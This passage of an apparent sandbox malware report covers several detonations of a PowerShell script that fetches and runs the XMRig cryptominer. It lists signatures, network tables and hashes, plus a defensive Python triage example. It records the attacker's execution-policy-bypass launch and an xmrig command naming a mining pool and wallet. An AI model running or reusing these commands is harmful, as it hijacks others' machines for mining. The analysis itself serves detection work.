| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 45.19.74.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.90.14.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.71.105.51.in-addr.arpa | udp |
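Added triage example for the listing above (example code written for this page; it is not part of the sandbox report and not XMRig's own code). It pulls pool host, wallet and worker out of the xmrig.exe command line, matches the pool host against rows of the Network table to isolate the stratum connection, flags the parent/child chain the WriteProcessMemory rows record (powershell.exe run with -ExecutionPolicy bypass on a script in %TEMP% spawning a process that carries a stratum URL), and recognises the __PSScriptPolicyTest_*.ps1 drops whose recorded SHA256 is the hash of the single byte "1", the throwaway file PowerShell writes at startup to probe application-control enforcement. Assumptions: the process-creation events are constructed from the behavioral9 listing (the parent of the powershell.exe process is not on this page and is given ppid 0); the second __PSScriptPolicyTest variant (SHA256 96ad1146...) is deliberately not matched because its content is unknown; the heuristics are analyst starting points, not the sandbox's signature logic.

```python
import hashlib
import re
from typing import Dict, List, Optional, Tuple

# Command lines copied from the "Processes" listing (behavioral9).
PS_CMD = ('powershell.exe -ExecutionPolicy bypass -File '
          '"C:\\Users\\Admin\\AppData\\Local\\Temp\\file01 - copia (4).ps1"')
XMRIG_CMD = ('"C:\\Users\\Admin\\AppData\\Local\\Temp\\xmrig-6.21.3\\xmrig.exe" -a rx '
             '-o stratum+ssl://rx.unmineable.com:443 '
             '-u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x')
# Rows copied from the behavioral9 "Network" table (Country, Destination, Domain, Proto).
NETWORK_TABLE = """\
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
"""
# Constructed process-creation events mirroring the behavioral9 tree: the
# WriteProcessMemory rows show PID 1504 (powershell.exe) -> PID 1932 (xmrig.exe).
# The parent of 1504 is not on this page, so its ppid is 0 here (assumption).
EVENTS = [
    {"pid": 1504, "ppid": 0, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "cmdline": PS_CMD},
    {"pid": 1932, "ppid": 1504, "image": r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe", "cmdline": XMRIG_CMD},
]

# xmrig short and long spellings of the options that identify the operator.
_XMRIG_OPTS = {"-a": "algo", "--algo": "algo", "-o": "pool", "--url": "pool",
               "-u": "user", "--user": "user", "-p": "password", "--pass": "password"}
_BYPASS_TEMP_SCRIPT = re.compile(
    r'-ExecutionPolicy\s+bypass\s+-File\s+"?[^"]*\\AppData\\Local\\Temp\\', re.I)


def split_windows_cmdline(cmd: str) -> List[str]:
    """Tokenize a Windows command line; a double-quoted run is one token."""
    return [quoted or bare for quoted, bare in re.findall(r'"([^"]*)"|(\S+)', cmd)]


def parse_xmrig_cmdline(cmd: str) -> Dict[str, Optional[str]]:
    """Recover algorithm, pool, wallet and worker from an xmrig command line.
    Accepts both '-o URL' and '--url=URL' spellings."""
    argv = split_windows_cmdline(cmd)
    cfg: Dict[str, Optional[str]] = dict.fromkeys(("algo", "pool", "user", "password"))
    cfg["binary"] = argv[0]
    i = 1
    while i < len(argv):
        name, has_eq, inline = argv[i].partition("=")
        if name in _XMRIG_OPTS:
            if has_eq:                       # --url=VALUE
                cfg[_XMRIG_OPTS[name]] = inline
            elif i + 1 < len(argv):          # -o VALUE
                cfg[_XMRIG_OPTS[name]] = argv[i + 1]
                i += 1
        i += 1
    pool, user = cfg["pool"], cfg["user"]
    # stratum+ssl://host:port -> host ; WALLET.WORKER -> (WALLET, WORKER)
    cfg["pool_host"] = pool.split("://", 1)[-1].rsplit(":", 1)[0] if pool else None
    cfg["wallet"] = user.split(".", 1)[0] if user else None
    cfg["worker"] = user.split(".", 1)[1] if user and "." in user else None
    return cfg


def parse_network_rows(table: str) -> List[Dict[str, str]]:
    """Parse '| Country | Destination | Domain | Proto |' rows into dicts."""
    rows = []
    for line in table.splitlines():
        cells = [c.strip() for c in line.strip().strip("|").split("|")]
        if len(cells) == 4:
            rows.append(dict(zip(("country", "dest", "domain", "proto"), cells)))
    return rows


def pool_connections(cfg: Dict[str, Optional[str]], rows: List[Dict[str, str]]) -> List[str]:
    """TCP destinations in the network table that were resolved from the miner's pool host."""
    return [r["dest"] for r in rows if r["proto"] == "tcp" and r["domain"] == cfg["pool_host"]]


def flag_bypass_launch_chain(events: List[Dict]) -> List[Tuple[int, int]]:
    """(parent_pid, child_pid) pairs where powershell.exe ran a %TEMP% script with
    -ExecutionPolicy bypass and the child it spawned carries a stratum pool URL."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for child in events:
        parent = by_pid.get(child["ppid"])
        if (parent is not None
                and parent["image"].lower().endswith("powershell.exe")
                and _BYPASS_TEMP_SCRIPT.search(parent["cmdline"])
                and "stratum+" in child["cmdline"].lower()):
            hits.append((parent["pid"], child["pid"]))
    return hits


def is_powershell_policy_probe(path: str, sha256: str) -> bool:
    """True for a __PSScriptPolicyTest_*.ps1 drop whose content is the single byte "1".
    PowerShell writes these to %TEMP% at startup to probe application-control
    (WDAC/AppLocker) enforcement; two of the drops on this page hash to exactly that.
    Any other content (the other two drops here) stays in the review list."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1]
    return (name.startswith("__PSScriptPolicyTest_") and name.endswith(".ps1")
            and sha256.lower() == hashlib.sha256(b"1").hexdigest())


if __name__ == "__main__":
    miner = parse_xmrig_cmdline(XMRIG_CMD)
    print("pool host:", miner["pool_host"], "wallet:", miner["wallet"], "worker:", miner["worker"])
    print("pool connections:", pool_connections(miner, parse_network_rows(NETWORK_TABLE)))
    print("bypass launch chains:", flag_bypass_launch_chain(EVENTS))
```

Run it directly to print the triage summary; the same functions take Sysmon event ID 1 fields or EDR process records in place of the constructed EVENTS list. The pool host is matched on the Domain column, so a miner started with a raw IP in -o would have to be matched on the Destination column instead, and the wallet/worker split assumes the WALLET.WORKER convention the unmineable user string follows.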
Files
memory/1504-0-0x00007FFF00A53000-0x00007FFF00A55000-memory.dmp
memory/1504-1-0x0000021CFE750000-0x0000021CFE772000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ezmqpdsz.sh3.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1504-11-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1504-12-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1504-14-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1504-15-0x0000021CFEC20000-0x0000021CFEC32000-memory.dmp
memory/1504-16-0x0000021CE40D0000-0x0000021CE40DA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1932-47-0x000002CAE2420000-0x000002CAE2440000-memory.dmp
memory/1932-48-0x000002CAE3D50000-0x000002CAE3D70000-memory.dmp
memory/1932-49-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1504-50-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1932-53-0x000002CAE3D70000-0x000002CAE3D90000-memory.dmp
memory/1504-52-0x00007FFF00A53000-0x00007FFF00A55000-memory.dmp
memory/1932-51-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-55-0x000002CAE3D90000-0x000002CAE3DB0000-memory.dmp
memory/1504-54-0x00007FFF00A50000-0x00007FFF01511000-memory.dmp
memory/1932-56-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-58-0x000002CAE3D70000-0x000002CAE3D90000-memory.dmp
memory/1932-57-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-59-0x000002CAE3D90000-0x000002CAE3DB0000-memory.dmp
memory/1932-60-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
memory/1932-{61..117}-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp (57 further dumps of the same region, one per index)
memory/1932-118-0x00007FF6CC390000-0x00007FF6CCFC3000-memory.dmp
Analysis: behavioral17
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:28
Platform
win10-20240404-en
Max time kernel
1797s
Max time network
1778s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches, no indicator detail recorded | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2584 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2584 wrote to memory of 2200 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/2584-4-0x00007FFD204C3000-0x00007FFD204C4000-memory.dmp
memory/2584-5-0x000002C4549D0000-0x000002C4549F2000-memory.dmp
memory/2584-6-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-9-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-10-0x000002C46D040000-0x000002C46D0B6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wwti52cp.dip.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/2584-26-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-49-0x000002C46CED0000-0x000002C46CEE2000-memory.dmp
memory/2584-62-0x000002C46CEC0000-0x000002C46CECA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/2200-91-0x000002E27DA50000-0x000002E27DA70000-memory.dmp
memory/2200-92-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-93-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2584-94-0x00007FFD204C3000-0x00007FFD204C4000-memory.dmp
memory/2584-95-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2584-96-0x00007FFD204C0000-0x00007FFD20EAC000-memory.dmp
memory/2200-97-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
memory/2200-{98..156}-0x00007FF69E500000-0x00007FF69F133000-memory.dmp (59 further dumps of the same region, one per index)
memory/2200-157-0x00007FF69E500000-0x00007FF69F133000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:41
Platform
win10v2004-20240508-en
Max time kernel
1792s
Max time network
1780s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 matches, no indicator detail recorded | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3364 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3364 wrote to memory of 1952 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.17.178.52.in-addr.arpa | udp |
Files
memory/3364-0-0x00007FFA85653000-0x00007FFA85655000-memory.dmp
memory/3364-1-0x00000194FA590000-0x00000194FA5B2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vqngwq4r.tlf.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3364-11-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3364-12-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3364-14-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/3364-15-0x00000194FA720000-0x00000194FA732000-memory.dmp
memory/3364-16-0x00000194FA580000-0x00000194FA58A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1952-47-0x000001F3F3390000-0x000001F3F33B0000-memory.dmp
memory/1952-48-0x000001F3F33E0000-0x000001F3F3400000-memory.dmp
memory/1952-49-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-52-0x000001F3F4CC0000-0x000001F3F4CE0000-memory.dmp
memory/1952-51-0x000001F3F4CE0000-0x000001F3F4D00000-memory.dmp
memory/1952-50-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/3364-53-0x00007FFA85653000-0x00007FFA85655000-memory.dmp
memory/3364-54-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/1952-55-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/3364-56-0x00007FFA85650000-0x00007FFA86111000-memory.dmp
memory/1952-57-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-58-0x000001F3F4CE0000-0x000001F3F4D00000-memory.dmp
memory/1952-59-0x000001F3F4CC0000-0x000001F3F4CE0000-memory.dmp
memory/1952-60-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-61-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-62-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-63-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-64-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-65-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-66-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-67-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-68-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-69-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-70-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-71-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-72-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-73-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-74-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-75-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-76-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-77-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-78-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-79-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-80-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-81-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-82-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-83-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-84-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-85-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-86-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-87-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-88-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-89-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-90-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-91-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-92-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-93-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-94-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-95-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-96-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-97-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-98-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-99-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-100-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-101-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-102-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-103-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-104-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-105-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-106-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-107-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-108-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-109-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-110-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-111-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-112-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-113-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-114-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-115-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-116-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-117-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
memory/1952-118-0x00007FF644280000-0x00007FF644EB3000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-27 00:27
Reported
2024-05-27 01:42
Platform
win11-20240426-en
Max time kernel
1799s
Max time network
1764s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5044 wrote to memory of 3444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5044 wrote to memory of 3444 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
